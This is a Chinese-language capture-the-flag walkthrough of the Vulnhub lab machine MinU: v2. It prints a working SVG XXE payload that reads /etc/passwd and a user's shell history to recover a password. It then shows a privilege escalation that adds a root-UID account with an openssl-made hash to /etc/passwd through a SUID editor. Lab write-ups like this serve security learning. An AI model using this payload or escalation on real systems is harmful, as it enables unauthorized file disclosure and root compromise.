主机层面扫描:

MinU: v2 Vulnhub Walkthrough Safe 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

22 和 3306 端口

3306 端口默认是MySQL端口,但是这里尝试爆破报错,最后通http访问发现非MySQL协议,而是一个http的服务

MinU: v2 Vulnhub Walkthrough Safe 第2张

http的协议我们进行目录枚举下

MinU: v2 Vulnhub Walkthrough Safe 第3张

MinU: v2 Vulnhub Walkthrough Safe 第4张

枚举到一个长传的点,我们试试访问下

http://10.10.202.10:3306/upload.html

上传反向shell试试

通过前段绕过svg的格式文件,上传PHP shell 失败,错误页面。

MinU: v2 Vulnhub Walkthrough Safe 第5张

 这里使用svg xxe 注入 漏洞

https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/

payload:

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>

以上内容保存到svgxxe.svg 文件中,尝试上传下

MinU: v2 Vulnhub Walkthrough Safe 第6张

右键源代码查看

MinU: v2 Vulnhub Walkthrough Safe 第7张

这里我们尝试读取下用户的历史命令,尝试看看是够有用户凭证啥的

这里就读取: /home/employee/.ash_history

MinU: v2 Vulnhub Walkthrough Safe 第8张

MinU: v2 Vulnhub Walkthrough Safe 第9张

└──╼ $sudo useradd -h | grep "\-p"
sudo: unable to resolve host HACK404: Name or service not known
  -p, --password PASSWORD       encrypted password of the new account

 所以这里的-p参数后面的字符串,应该是用户employee的密码

SSHD登陆

MinU: v2 Vulnhub Walkthrough Safe 第10张

进行提权操作

minuv2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
minuv2:~$
这里经过尝试可以使用micro来编辑passwd文件,可以尝试提权操作。

本地生成密码对应的hash值

$openssl passwd -1 -salt hack404 hack404123
$1$hack404$FyYmBA.v/Hgs60rVCMtiN1

 增加hash值到passwd文件

hack404:$1$hack404$FyYmBA.v/Hgs60rVCMtiN1:0:0:root:root:/bin/ash

MinU: v2 Vulnhub Walkthrough Safe 第11张

增加之后,按ESC键,然后输入y,保存名称为: /etc/passwd

MinU: v2 Vulnhub Walkthrough Safe 第12张

完结!

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄